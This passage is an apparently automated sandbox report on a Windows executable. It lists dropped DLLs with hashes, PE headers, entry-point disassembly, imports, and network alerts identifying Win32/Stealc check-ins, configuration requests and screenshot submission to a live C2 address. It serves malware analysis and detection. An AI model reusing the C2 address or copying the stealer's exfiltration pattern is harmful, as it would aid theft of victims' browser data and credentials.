                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80880
                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):685392
                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):608080
                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):450024
                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):257872
                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80880
                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32768
                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):6.500659620889233
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                    • InstallShield setup (43055/19) 0.43%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
                                                                                                                                                    File size:15'184'384 bytes
                                                                                                                                                    MD5:217e6aff108174a9a90022c19f8e5f8f
                                                                                                                                                    SHA1:a46822575426c3fac79c55f9cf9f8adb907ec58b
                                                                                                                                                    SHA256:5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717ceebaa28e2f865471e6
                                                                                                                                                    SHA512:4eb0078aa1e11ed94a5b4bd6a617a8d5b89008222393346d0ef7530874784372381cd15a8ae6a73d42341633aa872593d801a1b510bd7ea8585adfa42baf2cd9
                                                                                                                                                    SSDEEP:98304:z577+REoJLRAy844jhpk8dl1a7LJhMLruxYhlllFAvEw0xrk9onte:RcL5shG8haDMHuxMM
                                                                                                                                                    TLSH:2BE64A41F9DB58F5E9075C31919B722F2B309D058B29CBDBEB517E29F8372D2093A206
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B...............6f.........@.............@.................................0.....@................................
                                                                                                                                                    Icon Hash:7a687d245cdccc33
                                                                                                                                                    Entrypoint:0x479240
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:false
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:6
                                                                                                                                                    OS Version Minor:1
                                                                                                                                                    File Version Major:6
                                                                                                                                                    File Version Minor:1
                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                    Import Hash:1aae8bf580c846f39c71c05898e57e88
                                                                                                                                                    Instruction
                                                                                                                                                    jmp 00007FCB9CE4D850h
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    sub esp, 28h
                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                    mov dword ptr [esp+10h], ebp
                                                                                                                                                    mov dword ptr [esp+14h], esi
                                                                                                                                                    mov dword ptr [esp+18h], edi
                                                                                                                                                    mov dword ptr [esp], eax
                                                                                                                                                    mov dword ptr [esp+04h], ecx
                                                                                                                                                    call 00007FCB9CE286B6h
                                                                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                                                                    mov edi, dword ptr [esp+18h]
                                                                                                                                                    mov esi, dword ptr [esp+14h]
                                                                                                                                                    mov ebp, dword ptr [esp+10h]
                                                                                                                                                    mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                    add esp, 28h
                                                                                                                                                    retn 0004h
                                                                                                                                                    ret
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    sub esp, 08h
                                                                                                                                                    mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                    mov edx, dword ptr [ecx]
                                                                                                                                                    mov eax, esp
                                                                                                                                                    mov dword ptr [edx+04h], eax
                                                                                                                                                    sub eax, 00010000h
                                                                                                                                                    mov dword ptr [edx], eax
                                                                                                                                                    add eax, 00000BA0h
                                                                                                                                                    mov dword ptr [edx+08h], eax
                                                                                                                                                    mov dword ptr [edx+0Ch], eax
                                                                                                                                                    lea edi, dword ptr [ecx+34h]
                                                                                                                                                    mov dword ptr [edx+18h], ecx
                                                                                                                                                    mov dword ptr [edi], edx
                                                                                                                                                    mov dword ptr [esp+04h], edi
                                                                                                                                                    call 00007FCB9CE4FCA4h
                                                                                                                                                    cld
                                                                                                                                                    call 00007FCB9CE4ED3Eh
                                                                                                                                                    call 00007FCB9CE4D979h
                                                                                                                                                    add esp, 08h
                                                                                                                                                    ret
                                                                                                                                                    jmp 00007FCB9CE4FB50h
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    mov ebx, dword ptr [esp+04h]
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    mov dword ptr fs:[00000034h], 00000000h
                                                                                                                                                    mov ecx, dword ptr [ebx+04h]
                                                                                                                                                    cmp ecx, 00000000h
                                                                                                                                                    je 00007FCB9CE4FB51h
                                                                                                                                                    mov eax, ecx
                                                                                                                                                    shl eax, 02h
                                                                                                                                                    sub esp, eax
                                                                                                                                                    mov edi, esp
                                                                                                                                                    mov esi, dword ptr [ebx+08h]
                                                                                                                                                    cld
                                                                                                                                                    rep movsd
                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c0000x44c.idata
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xeb20000x6c03.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe5d0000x53fbc.reloc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xdbed200xb4.data
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x6634180x663600f6feb3f15c834971426e70ca1bc842abunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rdata0x6650000x757f100x75800004e6eee30d41692b5ef3baaf8d351e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0xdbd0000x9f0000x64200c4f95f61d4f0845b45709762eec3601cFalse0.3607209737827715data5.721429091119689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .idata0xe5c0000x44c0x600bd3667dc3a6b1a2c98f4241ecd45f2a8False0.3587239583333333OpenPGP Public Key3.874332394538109IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                    .reloc0xe5d0000x53fbc0x54000fc389e1871171d89a5c61820f29f35d8False0.5541672479538691data6.627781927979654IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .symtab0xeb10000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0xeb20000x6c030x6e00b9765f217d27405001e708fa74e2ab84False0.4491832386363636data5.824120417813786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                    RT_ICON0xeb22b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                                                                                                                    RT_ICON0xeb23d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6893063583815029
                                                                                                                                                    RT_ICON0xeb29400x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.40456989247311825
                                                                                                                                                    RT_ICON0xeb2c280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7486462093862816
                                                                                                                                                    RT_ICON0xeb34d00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.3646341463414634
                                                                                                                                                    RT_ICON0xeb3b380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.39365671641791045
                                                                                                                                                    RT_ICON0xeb49e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6054964539007093
                                                                                                                                                    RT_ICON0xeb4e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5105534709193246
                                                                                                                                                    RT_ICON0xeb5ef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.39481327800829874
                                                                                                                                                    RT_GROUP_ICON0xeb84980x84dataEnglishUnited States0.6363636363636364
                                                                                                                                                    RT_VERSION0xeb851c0x244dataEnglishUnited States0.4879310344827586
                                                                                                                                                    RT_MANIFEST0xeb87600x4a3ASCII text, with very long lines (1187), with no line terminatorsEnglishUnited States0.46166807076663857
                                                                                                                                                    DLLImport
                                                                                                                                                    kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States
                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                    2024-10-21T08:47:17.815806+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:18.070651+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:18.076775+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1147.45.44.22180192.168.2.449732TCP
                                                                                                                                                    2024-10-21T08:47:18.325741+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:18.332442+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1147.45.44.22180192.168.2.449732TCP
                                                                                                                                                    2024-10-21T08:47:18.905321+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:19.968265+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:26.005541+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:27.705002+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:28.963477+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:29.735457+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:31.542241+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:32.089369+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    2024-10-21T08:47:33.801751+02002044249ET MALWARE Win32/Stealc Submitting Screenshot to C21192.168.2.449732147.45.44.22180TCP
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Oct 21, 2024 08:47:16.684637070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:16.689652920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:16.689723969 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:16.691220999 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:16.696073055 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:17.548475981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:17.548607111 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:17.550791979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:17.555696011 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:17.814910889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:17.815805912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:17.816734076 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:17.821953058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.070502043 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.070559025 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.070651054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:18.071010113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:18.071930885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:18.076775074 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.325493097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.325587034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.325618982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:18.325651884 CEST8049732147.45.44.221192.168.2.4
